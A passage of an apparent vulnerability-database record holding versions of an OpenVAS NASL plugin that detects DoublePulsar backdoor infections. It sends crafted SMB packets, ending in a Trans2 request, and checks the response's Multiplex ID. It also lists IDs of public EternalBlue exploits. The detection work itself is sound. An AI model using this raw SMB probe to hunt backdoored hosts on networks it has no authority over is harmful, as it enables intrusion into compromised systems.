0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88,\n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00,\n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00,\n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42,\n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c,\n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01,\n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2019-05-06T14:28:51"}, {"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "f965112c99785f13cf6356b9533ba7406843424d7437cad6ab973f774d3e537d", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2017-10-25T14:48:43", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_doublepulsar_infection_detect.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"$Revision: 7543 $\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks \n will cause denial of service conditions.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name : \"URL\" , value : \"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name : \"URL\" , value : \"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_req = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_req = \"\";\nsmb_sess_resp = \"\";\nsmb_tree_resp = \"\";\nsmbtrans2_request = \"\";\nsmb_trans2_resp = \"\";\ntid_low = \"\";\ntid_high = \"\";\nuid_low = \"\";\nuid_high = \"\";\nuid = \"\";\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42, \n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02, \n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, \n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, \n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, \n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, \n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, \n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57, \n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, \n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02, \n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, \n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, \n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, \n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, \n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42, \n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88, \n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, \n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, \n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, \n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, \n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00, \n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, \n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, \n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, \n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00, \n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42, \n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00, \n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c, \n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01, \n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2017-10-25T14:48:43"}], "viewCount": 240, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0147"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-05-29T18:33:53", "rev": 2}, "score": {"value": 9.3, "vector": "NONE", "modified": "2019-05-29T18:33:53", "rev": 2}}, "objectVersion": "1.5", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks\n will cause denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name:\"URL\", value:\"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name:\"URL\", value:\"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88,\n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00,\n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00,\n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42,\n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c,\n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01,\n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 